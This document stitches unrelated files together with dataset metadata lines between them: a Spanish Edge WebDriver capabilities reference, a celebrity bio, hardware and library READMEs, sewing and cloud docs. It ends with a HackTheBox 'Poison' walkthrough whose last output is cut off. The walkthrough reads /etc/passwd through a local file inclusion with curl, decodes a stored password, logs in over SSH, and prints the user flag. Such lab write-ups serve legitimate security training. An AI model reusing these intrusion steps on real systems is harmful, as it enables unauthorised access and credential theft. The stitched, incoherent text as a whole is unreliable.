--- description: Una referencia para las capacidades de WebDriver y Microsoft Edge opciones específicas admitidas por EdgeDriver (Chromium). title: Funciones y EdgeOptions author: MSEdgeTeam ms.author: msedgedevrel ms.date: 02/10/2021 ms.topic: article ms.prod: microsoft-edge ms.technology: devtools keywords: microsoft edge, desarrollo web, html, css, javascript, programador, webdriver, selenio, pruebas, herramientas, automatización, prueba ms.openlocfilehash: 1d7dbfb6071efde3a5f31534351668e475973f2133fc3ba0f91c4fb812ce0f8b ms.sourcegitcommit: 841e41de1a32501ece862399fa56170c022127c5 ms.translationtype: MT ms.contentlocale: es-ES ms.lasthandoff: 08/06/2021 ms.locfileid: "11798788" --- # <a name="capabilities-and-edgeoptions"></a>Funciones y EdgeOptions Las funcionalidades son opciones que puede usar para personalizar y configurar una `EdgeDriver` sesión. Para obtener información sobre cómo iniciar una nueva sesión, vaya a `EdgeDriver` [Automatizar Microsoft Edge][WebdriverIndexAutomateMicrosoftEdgeChromium]. En este artículo se describen todas las funcionalidades admitidas [Microsoft Edge][WebdriverIndexInstallMicrosoftEdgeChromium] detalles sobre cómo pasar las funciones a `EdgeDriver` las sesiones. Las funcionalidades se pasan a una sesión de WebDriver como un mapa JSON. Un marco de prueba de WebDriver proporciona un enlace de idioma de WebDriver. Los enlaces de idioma de WebDriver suelen proporcionar métodos de comodidad seguros para el tipo, por lo que no es necesario configurar el mapa JSON usted mismo. Los diferentes enlaces de idioma de WebDriver usan diferentes mecanismos para configurar capacidades. [Selenio][SeleniumMain] configura las capacidades a través de la `EdgeOptions` clase. Para obtener más información sobre cómo configurar funcionalidades, consulte la documentación del marco de pruebas de WebDriver preferido. Para obtener más información, vaya [a Elegir un marco de pruebas de WebDriver][WebdriverIndexChooseAWebdriverTestingFramework]. ## <a name="using-the-edgeoptions-class"></a>Uso de la clase EdgeOptions Cree una instancia de `EdgeOptions` , que proporciona métodos de comodidad para establecer Microsoft Edge funcionalidades específicas. Después de configurar el `EdgeOptions` objeto, pase `EdgeOptions` al `EdgeDriver` constructor. ```csharp var options = new EdgeOptions(); options.UseChromium = true; options.AddExtensions("/path/to/extension.crx"); var driver = new EdgeDriver(options); ``` Para usar funcionalidades que no tienen un método de comodidad asociado, use el `AddAdditionalCapability` método. Debe pasar el nombre completo de la funcionalidad y un valor con el tipo correcto. Para revisar la lista completa de funcionalidades y tipos de valor aceptados, vaya al [objeto EdgeOptions](#edgeoptions-object). ```csharp options.AddAdditionalCapability("wdpAddress", "remotehost:50080"); ``` ## <a name="recognized-capabilities"></a>Capacidades reconocidas Para las funcionalidades estándar que acepta, navegue a la documentación `EdgeDriver` [de Selenium][SharedCapabilitiesSeleniumDocumentation] y al estándar [W3C WebDriver][CapabilitiesW3cWebdriver]. En este artículo solo se enumeran las funcionalidades específicas de Microsoft Edge. ## <a name="edgeoptions-object"></a>EdgeOptions (objeto) La mayoría Microsoft Edge funcionalidades específicas se exponen a través del `EdgeOptions` objeto. En algunos idiomas, la clase implementa las `EdgeOptions` capacidades. En otros idiomas, las capacidades se almacenan en el `ms:edgeOptions` diccionario en `DesiredCapabilities` . | Funcionalidad | Tipo | Valor predeterminado | Detalles | |:--- |:--- |:--- |:--- | | args | lista de cadenas | | Lista de argumentos de línea de comandos que se deben usar al iniciar Microsoft Edge. Los argumentos con un valor asociado deben estar separados por `=` un signo \(por ejemplo, `['start-maximized', 'user-data-dir=/tmp/temp_profile']` \). | | binario | string | | Ruta de acceso al Microsoft Edge binario para usar \(en macOS, la ruta de acceso debe ser el binario real, no solo la aplicación. por ejemplo, `/Applications/Microsoft Edge.app/Contents/MacOS/Microsoft Edge` \). | | debuggerAddress | string | | Una dirección de un servidor depurador al que se va a conectar, en forma de `hostname/ip:port` , por ejemplo `127.0.0.1:38947` . | | desasoy | booleano | `false` | Si , Microsoft Edge cierra cuando se cierra el servicio WebDriver, incluso si el extremo local de `false` WebDriver no ha cerrado la sesión. Si `true` , Microsoft Edge solo se cierra si el extremo local de WebDriver cierra la sesión. Si , y el extremo local de WebDriver no cierra la sesión, no limpia la carpeta de datos de usuario temporal que usa la instancia Microsoft Edge `true` `EdgeDriver` usuario. | | excludeSwitches | lista de cadenas | | Lista de Microsoft Edge de línea de comandos para excluir que EdgeDriver pasa de forma predeterminada al iniciar Microsoft Edge. Evite el `--` prefijo de los modificadores. | | extensiones | lista de cadenas | | Una lista de extensiones que se instalarán en el inicio. Cada elemento de la lista debe ser una extensión empaquetada codificada en base 64 \( `.crx` \). | | localState | diccionario | | Diccionario con cada entrada que consta del nombre de la preferencia y el valor. Las preferencias se aplican al archivo De estado local de la carpeta de datos del usuario. | | minidumpPath | string | | Directorio para almacenar Microsoft Edge minidumps. \(Compatible solo en Linux.\) | | mobileEmulation | diccionario | | Diccionario con un valor para `deviceName` , o valores para y `deviceMetrics` `userAgent` . | | perfLoggingPrefs | diccionario | | Diccionario opcional que especifica las preferencias de registro de rendimiento. para obtener más información, vaya al [objeto perfLoggingPrefs](#perfloggingprefs-object). | | prefs | diccionario | | Diccionario con cada entrada que consta del nombre de la preferencia y el valor. Las preferencias solo se aplican al perfil de usuario en uso. Por ejemplo, vaya al archivo de la carpeta de datos `Preferences` de usuario de Microsoft Edge. | | wdpAddress | string | | Dirección de un servidor Windows Device Portal al que se conecta, en forma de `hostname/ip:port` , por ejemplo `127.0.0.1:50080` . Para obtener más información, vaya a [Depuración remota: Windows 10 dispositivos][DevtoolsRemoteDebuggingWindows]. | | wdpPassword | string | | Contraseña opcional para usar al conectarse a un servidor Windows Device Portal. Obligatorio si el servidor tiene habilitada la autenticación. | | wdpUsername | string | | Nombre de usuario opcional que se usará al conectarse a un servidor Windows Device Portal. Obligatorio si el servidor tiene habilitada la autenticación. | | windowsApp | string | | Id. de modelo de usuario de aplicación Microsoft Edge paquete de aplicación que se debe iniciar, por ejemplo `Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe!MSEDGE` . Se `windowsApp` usa en lugar de al `binary` conectarse a un Windows 10X o emulador mediante Windows Device Portal. | | windowTypes | lista de cadenas | | Una lista de tipos de ventana que se muestran en la lista de identificadores de ventana. Para obtener acceso a los elementos webview de Android, incluya `webview` en la lista. | ## <a name="perfloggingprefs-object"></a>perfLoggingPrefs (objeto) El `perfLoggingPrefs` diccionario tiene el siguiente formato \(todas las claves son opcionales\). | Tecla | Tipo | Valor predeterminado | Detalles | |:--- |:--- |:--- |:--- | | bufferUsageReportingInterval | entero positivo | 1000 | Número solicitado de milisegundos entre los eventos de uso del búfer de seguimiento de DevTools. Por ejemplo, si es 1000, una vez por segundo, DevTools informa de lo lleno que está el búfer de seguimiento. Si un informe indica que el uso del búfer es del 100 %, se emite una advertencia. | | enableNetwork | booleano | true | Para recopilar eventos \(o no recopilar\) del dominio de red. | | enablePage | booleano | true | Para recopilar eventos \(or not collect\) del dominio Page. | | traceCategories | string | \(empty\) | Una cadena separada por comas de Microsoft Edge de seguimiento para las que se deben recopilar los eventos de seguimiento. Una cadena no especificada o vacía deshabilita el seguimiento. | ## <a name="returned-capabilities"></a>Capacidades devueltas La siguiente lista contiene todas las funciones Microsoft Edge específicas que `EdgeDriver` se devuelven al crear una nueva sesión. | Funcionalidad | Tipo | Detalles | |:--- |:--- |:--- | | msedge.msedgedriverVersion | string | La versión de EdgeDriver. | | msedge.userDataDir | string | Ruta de acceso a la carpeta de datos de usuario usada por la Microsoft Edge usuario. | <!-- links --> [DevtoolsRemoteDebuggingWindows]: ../devtools-guide-chromium/remote-debugging/windows.md "Introducción a la depuración remota Windows 10 dispositivos | Microsoft Docs" [WebdriverIndexChooseAWebdriverTestingFramework]: ./index.md#choose-a-webdriver-testing-framework "Elegir un marco de prueba de WebDriver: use WebDriver (Chromium) para la automatización de pruebas | Microsoft Docs" [WebdriverIndexAutomateMicrosoftEdgeChromium]: ./index.md#automate-microsoft-edge-chromium "Automatizar Microsoft Edge (Chromium) - WebDriver (Chromium) | Microsoft Docs" [WebdriverIndexInstallMicrosoftEdgeChromium]: ./index.md#install-microsoft-edge-chromium "Instalar Microsoft Edge (Chromium) - WebDriver (Chromium) | Microsoft Docs" <!-- external links --> [SeleniumMain]: https://www.selenium.dev "Automatización del explorador SeleniumHQ" [SharedCapabilitiesSeleniumDocumentation]: https://www.selenium.dev/documentation/en/driver_idiosyncrasies/shared_capabilities/ "Capacidades compartidas | Documentación de Selenio" [CapabilitiesW3cWebdriver]: https://www.w3.org/TR/webdriver#capabilities "Funcionalidades: especificación de WebDriver | W3C"
99.98
505
0.775255
spa_Latn
0.952847
485fb1b8ea04ce4ab234909fa1b16d1cfdeb9e26
2,285
md
Markdown
_posts/people-love/15/2021-04-07-avi-kaplan.md
chito365/p
d43434482da24b09c9f21d2f6358600981023806
[ "MIT" ]
null
null
null
_posts/people-love/15/2021-04-07-avi-kaplan.md
chito365/p
d43434482da24b09c9f21d2f6358600981023806
[ "MIT" ]
null
null
null
_posts/people-love/15/2021-04-07-avi-kaplan.md
chito365/p
d43434482da24b09c9f21d2f6358600981023806
[ "MIT" ]
null
null
null
--- id: 8289 title: Avi Kaplan date: 2021-04-07T05:14:21+00:00 author: Laima layout: post guid: https://ukdataservers.com/avi-kaplan/ permalink: /04/07/avi-kaplan tags: - show love - unspecified - single - relationship - engaged - married - complicated - open relationship - widowed - separated - divorced - Husband - Wife - Boyfriend - Girlfriend category: Guides --- * some text {: toc} ## Who is Avi Kaplan Former vocalist of the a capella group Pentatonix. The group won the third season of The Sing-Off on NBC in 2011, singing an arrangement of &#8220;Eye of the Tiger.&#8221; He announced his departure from the group in May 2017 and released his debut solo project, Avriel & the Sequoias, later that same year.  ## Prior to Popularity He attended Mt. San Antonio College where he joined the all-male a capella group Fermata Nowhere.  ## Random data He won the ICCA Award for &#8220;Best Rhythm Section&#8221; for his performance with Fermata Nowhere.  ## Family & Everyday Life of Avi Kaplan He has two siblings, Joshua and Esther. Esther became the tour manager for Pentatonix.  ## People Related With Avi Kaplan While competing on The Sing-Off, his group performed &#8220;Let&#8217;s Get it On&#8221; by Marvin Gaye. 
21.761905
308
0.404814
eng_Latn
0.997578
48604f6fc7fbdbc07820e072572a3abcfbf720fb
774
md
Markdown
0124-logic-level-shifter-x4/README.md
CircuitMonkey/CHIPs
b91bcda972b97135d691ffd3223759ed2884b126
[ "Apache-2.0" ]
null
null
null
0124-logic-level-shifter-x4/README.md
CircuitMonkey/CHIPs
b91bcda972b97135d691ffd3223759ed2884b126
[ "Apache-2.0" ]
null
null
null
0124-logic-level-shifter-x4/README.md
CircuitMonkey/CHIPs
b91bcda972b97135d691ffd3223759ed2884b126
[ "Apache-2.0" ]
null
null
null
# Circuit Monkey CHIPs &#35;0124 -- Logic Level Shifter ## Images <img src="Documents/assets/0124A-logic-level-shifter-3D.png" alt="3D rendering" width="300" /><img src="Documents/assets/0124A-logic-level-shifter-preview-top.png" alt="Top View" width="300" /> <img src="Documents/assets/0124A-logic-level-shifter-preview-bottom.png" alt="Bottom View" width="300" /> ## Technical Details * For shifting logic levels between 3.3V and 5V signals (like mixed voltage I2C busses). * **Dimensions:** 8mm wide x 11mm tall x 1.6mm PCB thickness * **Pad Style:** Castellated Pin Edges allow easy surface mounting as well as hand wiring * **Pad Pitch:** Minimum Pad Pitch is 2.0mm * **Chip:** Toshiba [SSM6N7002 Dual N-Fet](Documents/3rd-party/Toshiba_SSM6N7002BFE_datasheet.pdf)
64.5
300
0.742894
eng_Latn
0.433996
4860b0372875bc8b1f02ededc74b87e402fa9303
112
md
Markdown
guidelines/subject.md
VickyTEI/bcdams-map
0cdec76b76309aa611a29df9d6cf14545a8b9ac0
[ "MIT" ]
null
null
null
guidelines/subject.md
VickyTEI/bcdams-map
0cdec76b76309aa611a29df9d6cf14545a8b9ac0
[ "MIT" ]
9
2021-01-28T17:33:26.000Z
2021-01-31T20:28:47.000Z
guidelines/subject.md
VickyTEI/bcdams-map
0cdec76b76309aa611a29df9d6cf14545a8b9ac0
[ "MIT" ]
null
null
null
--- layout: template1 title: Subject data: subject comments: false --- {% include guidelines.md %} ## Subject
10.181818
27
0.6875
eng_Latn
0.964768
4860f8cd77fa975e6d1fcb7718f82020472679fe
596
md
Markdown
markdown/org/docs/patterns/yuri/needs/fr.md
biou/freesewing
9a0cc3d4ed3f6296ed4dd41bf60c5a1745219bf7
[ "MIT" ]
null
null
null
markdown/org/docs/patterns/yuri/needs/fr.md
biou/freesewing
9a0cc3d4ed3f6296ed4dd41bf60c5a1745219bf7
[ "MIT" ]
25
2021-10-18T04:52:42.000Z
2022-03-25T05:04:10.000Z
markdown/org/docs/patterns/yuri/needs/fr.md
biou/freesewing
9a0cc3d4ed3f6296ed4dd41bf60c5a1745219bf7
[ "MIT" ]
1
2022-03-29T17:19:46.000Z
2022-03-29T17:19:46.000Z
Pour faire Yuri, vous aurez besoin des éléments suivants : - [Fourniture de base pour la couture](/docs/sewing/basic-sewing-supplies) - About 2.5 meter of a suitable fabric ([see Fabric options](/docs/patterns/yuri/fabric)) - 2 gros boutons <Note> #### Une surjeteuse serait un plus, mais reste en option Comme pour tous les mailles et étoffes, une surjeteuse vous facilitera la vie. Si vous n'en avez pas, ne désespérez pas. Vous n'en avez pas vraiment besoin. Etant donné qu’aucune des coutures n’est étirée, vous pouvez simplement coudre ce motif avec un point droit régulier. </Note>
33.111111
117
0.760067
fra_Latn
0.991807
4862216903048f15db7afa4b1411d84c9c16fd75
809
md
Markdown
en/_includes/data-proc/jobs-list.md
IyliyaChe/docs
15b2c8f12569ac6cb69224a32aaa0f223d675076
[ "CC-BY-4.0" ]
null
null
null
en/_includes/data-proc/jobs-list.md
IyliyaChe/docs
15b2c8f12569ac6cb69224a32aaa0f223d675076
[ "CC-BY-4.0" ]
null
null
null
en/_includes/data-proc/jobs-list.md
IyliyaChe/docs
15b2c8f12569ac6cb69224a32aaa0f223d675076
[ "CC-BY-4.0" ]
null
null
null
{% list tabs %} - Management console 1. Go to the folder page and select **{{ dataproc-name }}**. 1. Click on the name of the cluster and open the **Jobs** tab. - CLI {% include [cli-install](../cli-install.md) %} {% include [default-catalogue](../default-catalogue.md) %} To get a list of jobs, run the command: ```bash yc dataproc job list --cluster-name <cluster name> ``` You can find out the cluster ID and name in a [list of clusters in the folder](../../data-proc/operations/cluster-list.md#list). - API Use the [list](../../data-proc/api-ref/Job/list) API method and pass the cluster ID in the `clusterId` request parameter. You can get the cluster ID with a [list of clusters in the folder](../../data-proc/operations/cluster-list.md#list). {% endlist %}
27.896552
131
0.658838
eng_Latn
0.948108
48624e666dabe729c56d53956969b1dee04cbd7f
2,744
md
Markdown
README.md
whitesmith/WSReachability
65aeef4556b9dc77246475e690e48bd70dd99834
[ "MIT" ]
null
null
null
README.md
whitesmith/WSReachability
65aeef4556b9dc77246475e690e48bd70dd99834
[ "MIT" ]
null
null
null
README.md
whitesmith/WSReachability
65aeef4556b9dc77246475e690e48bd70dd99834
[ "MIT" ]
null
null
null
# WSReachability [![Carthage Compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg)](https://github.com/Carthage/Carthage) [![SwiftPM Compatible](https://img.shields.io/badge/SwiftPM-Compatible-brightgreen.svg)](https://swift.org/package-manager/) [![CocoaPods Compatible](https://img.shields.io/cocoapods/v/WSReachability.svg)](https://cocoapods.org/pods/WSReachability) [![Swift 3.0](https://img.shields.io/badge/Swift-3.0-orange.svg?style=flat)](https://developer.apple.com/swift/) [![Platforms iOS](https://img.shields.io/badge/Platforms-iOS-lightgray.svg?style=flat)](http://www.apple.com/ios/) [![License MIT](https://img.shields.io/badge/License-MIT-lightgrey.svg?style=flat)](https://opensource.org/licenses/MIT) Monitor the network state of an iOS device using the System Configuration. ## Usage Create an instance passing a host that you want to listen: ``` swift let reachability = WSReachability(use: "api.greatproject.io") ``` Listen for event changes: ``` swift reachability?.listen { reachable in print("Great Project API is reachable:", reachable) } ``` It's possible to log each event that's occurring by subscribing it: ``` swift reachability?.log.subscribe { message in print("Reachability:", message) } ``` ## Installation #### <img src="https://cloud.githubusercontent.com/assets/432536/5252404/443d64f4-7952-11e4-9d26-fc5cc664cb61.png" width="24" height="24"> [Carthage] [Carthage]: https://github.com/Carthage/Carthage To install it, simply add the following line to your **Cartfile**: ```ruby github "whitesmith/WSReachability" ``` Then run `carthage update`. Follow the current instructions in [Carthage's README][carthage-installation] for up to date installation instructions. [carthage-installation]: https://github.com/Carthage/Carthage#adding-frameworks-to-an-application #### <img src="https://raw.githubusercontent.com/ricardopereira/resources/master/img/cocoapods.png" width="24" height="24"> [CocoaPods] [CocoaPods]: http://cocoapods.org To install it, simply add the following line to your **Podfile**: ```ruby pod 'WSReachability' ``` You will also need to make sure you're opting into using frameworks: ```ruby use_frameworks! ``` Then run `pod install` with CocoaPods 1.0 or newer. #### Manually Download all the source files and drop them into your project. ## Requirements * iOS 8.0+ * Xcode 8.3 (Swift 3.0) # Contributing The best way to contribute is by submitting a pull request. We'll do our best to respond to your patch as soon as possible. You can also submit a [new GitHub issue](https://github.com/whitesmith/WSReachability/issues/new) if you find bugs or have questions. :octocat: # Credits ![Whitesmith](http://i.imgur.com/Si2l3kd.png)
31.181818
267
0.748178
eng_Latn
0.627865
4862b98b43db1b4869e8c0bb694b922a4d387725
17,707
md
Markdown
_posts/2018-05-10-107-poison-hackthebox.md
rowbot1/offsec
db996aaeb6a971a77eb9a5f91921a10639545756
[ "CC0-1.0" ]
null
null
null
_posts/2018-05-10-107-poison-hackthebox.md
rowbot1/offsec
db996aaeb6a971a77eb9a5f91921a10639545756
[ "CC0-1.0" ]
null
null
null
_posts/2018-05-10-107-poison-hackthebox.md
rowbot1/offsec
db996aaeb6a971a77eb9a5f91921a10639545756
[ "CC0-1.0" ]
null
null
null
--- layout: post title: Poison - Hackthebox date: 2018-05-10 20:28 author: rowbot comments: true categories: [Hackthebox] --- <strong>Skills Required</strong> Basic knowledge of Linux Enumerating ports and services Basic understanding of cryptography <strong>Skills Learned</strong> SSH Tunneling VNCViewer commands Grep -vE to select non-matching lines START Initial port scan <pre>[root:~/Desktop/poison]# nmap -p- 10.10.10.84 -oA portscan Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-09 15:11 BST Nmap scan report for 10.10.10.84 Host is up, received echo-reply ttl 63 (0.035s latency). Not shown: 54531 filtered ports, 10999 closed ports Reason: 54531 no-responses and 10999 resets Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 5802/tcp open vnc-http-2 syn-ack ttl 63 5902/tcp open vnc-2 syn-ack ttl 63 6002/tcp open X11:2 syn-ack ttl 63</pre> Enum Ports <pre>[root:~/Desktop/poison]# nmap -sC -sV -p 22,80,5802,5902,6002 10.10.10.84 -oA enumports Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-09 15:13 BST Nmap scan report for 10.10.10.84 Host is up, received echo-reply ttl 63 (0.033s latency). PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) | ssh-hostkey: | 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA) | 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA) |_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519) 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32) |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32 https://wordpress.com/post/offsecnewbie.wordpress.com/32|_http-title: Site doesn't have a title (text/html; charset=UTF-8). 5802/tcp open http syn-ack ttl 63 Bacula http config 5902/tcp open vnc syn-ack ttl 63 VNC (protocol 3.8) | vnc-info: | Protocol version: 3.8 | Security types: | VNC Authentication (2) | Tight (16) | Tight auth subtypes: |_ STDV VNCAUTH_ (2) 6002/tcp open X11 syn-ack ttl 63 (access denied) Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.27 seconds</pre> nmap http enum <pre>[root:~/Desktop/poison]# nmap -Pn -p 80 --script http-enum 10.10.10.84</pre> <pre>Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-09 15:15 BST</pre> <pre>Nmap scan report for 10.10.10.84</pre> <pre>Host is up, received user-set (0.032s latency).</pre> <pre>PORT STATE SERVICE REASON</pre> <pre>80/tcp open http syn-ack ttl 63</pre> <pre>| http-enum:</pre> <pre>| /info.php: Possible information file</pre> <pre>|_ /phpinfo.php: Possible information file</pre> <pre>Nmap done: 1 IP address (1 host up) scanned in 3.42 seconds</pre> Here is what we can see from the website. <img class="alignnone wp-image-33 size-full" src="http://offsecnewbie.com/wp-content/uploads/2018/04/poison-port-80.png" alt="poison port 80" width="916" height="331" />I entered testscript.php in the field and i got an error: <pre> <b>Warning</b>: include(testscript.php): failed to open stream: No such file or directory in <b>/usr/local/www/apache24/data/browse.php</b> on line <b>2</b> <b>Warning</b>: include(): Failed opening 'testscript.php' for inclusion (include_path='.:/usr/local/www/apache24/data') in <b>/usr/local/www/apache24/data/browse.php</b> on line <b>2</b></pre> Now to search for possible LFI <pre>[root:~/Desktop/poison]# fimap -u "http://10.10.10.84/browse.php?file=" [2/1957] fimap v.1.00_svn (My life for Aiur) :: Automatic LFI/RFI scanner and exploiter :: by Iman Karim (fimap.dev@gmail.com) SingleScan is testing URL: 'http://10.10.10.84/browse.php?file=' [14:53:52] [OUT] Inspecting URL 'http://10.10.10.84/browse.php?file='... [14:53:52] [INFO] Fiddling around with URL... [14:53:52] [OUT] [PHP] Possible file inclusion found! -&gt; 'http://10.10.10.84/browse.php?file=z2hu63pz' with Parameter 'file'. [14:53:52] [OUT] [PHP] Identifying Vulnerability 'http://10.10.10.84/browse.php?file=' with Parameter 'file'... [14:53:53] [INFO] Scriptpath received: '/usr/local/www/apache24/data' [14:53:53] [INFO] Operating System is 'Unix-Like'. [14:53:53] [INFO] Testing file '/etc/passwd'... [14:53:53] [INFO] Testing file '/proc/self/environ'... [14:53:53] [INFO] Testing file 'php://input'... .... .... ######################################################## #[1] Possible PHP-File Inclusion # ######################################################## #::REQUEST # # [URL] http://10.10.10.84/browse.php?file= # # [HEAD SENT] # #::VULN INFO # # [GET PARAM] file # # [PATH] /usr/local/www/apache24/data # # [OS] Unix # # [TYPE] Absolute Clean # # [TRUNCATION] No Need. It's clean. # # [READABLE FILES] # # [0] /etc/passwd # ########################################################</pre> Got access to the /etc/passwd file <pre>[root:~/Desktop/poison]# curl -s http://10.10.10.84/browse.php\?file\=/etc/passwd root:*:0:0:Charlie &amp;:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &amp;:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin _ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin _tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin charix:*:1001:1001:charix:/home/charix:/bin/csh</pre> I copied that to a file called passwdfile then did an inverted grep search of that file pulling out the users that have login abilities. I must remember that command in future its very useful! <pre>[root:~/Desktop/poison]# nano passwdfile</pre> <pre>[root:~/Desktop/poison]# grep -vE nologin passwdfile</pre> <pre>root:*:0:0:Charlie &amp;:/root:/bin/csh</pre> <pre>toor:*:0:0:Bourne-again Superuser:/root:</pre> <pre>uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico</pre> <pre>charix:*:1001:1001:charix:/home/charix:/bin/csh</pre> So we have 4 users will login abilities: root, a user toor with superuser access, uucp - no clue what this user has and what looks like a started user charix. Lets save them off to a file users. I tried sshing some of those users with a few random passwords - no luck (didn't expect anything but no harm in trying!) Okay looking at the main webpage again I added the file names to see if i can access them <pre> ini.php, info.php, listfiles.php, phpinfo.php</pre> listfiles.php gave me <pre id="line1">Array ( [0] =&gt; . [1] =&gt; .. [2] =&gt; browse.php [3] =&gt; index.php [4] =&gt; info.php [5] =&gt; ini.php [6] =&gt; listfiles.php [7] =&gt; phpinfo.php [8] =&gt; pwdbackup.txt )</pre> I think i nearly broke the keyboard with excitement typing pwdbackup.txt in the to web address bar! We're getting somewhere! <pre>This password is secure, it's encoded atleast 13 times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo=</pre> I went to https://codebeautify.org/base64-decode and input the code. I copied the code from the several times from the decoded and pasted into the coded section ( probably 13 as the previous web page suggested ) and got something that looked like the password for user charix The password is <span style="font-size: 1rem;">Charix!2#4%6&amp;8(0</span> I ssh'd in using that password <pre>[root:~/Desktop/poison]# ssh charix@10.10.10.84 Password for charix@Poison: Last login: Mon Apr 9 15:44:16 2018 from :2 FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017 Welcome to FreeBSD! ........ ........ Edit /etc/motd to change this login announcement. Want to go the directory you were just in? Type "cd -" charix@Poison:~ % ls -l │ total 44 │ -rw-r----- 1 root charix 166 Mar 19 16:35 secret.zip │ -rw-r----- 1 root charix 33 Mar 19 16:11 user.txt │ charix@Poison:~ % cat user.txt │ eaacdfb2d141b72a589233063604209c</pre> I copied lineenum.py on my kali box and started a webserver so i could download it using wget from the Poison machine. <img class="alignnone size-full wp-image-36" src="http://offsecnewbie.com/wp-content/uploads/2018/04/wget.png" alt="wget" width="1576" height="258" /> I tried to run it but got an error Command not found. <pre>charix@Poison:~ % ./linenum.sh</pre> <pre>./linenum.sh: Command not found.</pre> <pre>carix@Poison:~ %</pre> Not sure whats going on there. Not deterred I downloaded the secret.zip file to kali machine using Python's SimpleHTTPServer. <pre>[root:~/Desktop/poison]# unzip secret.zip COPYRIGHT entropy libexec proc sys │Archive: 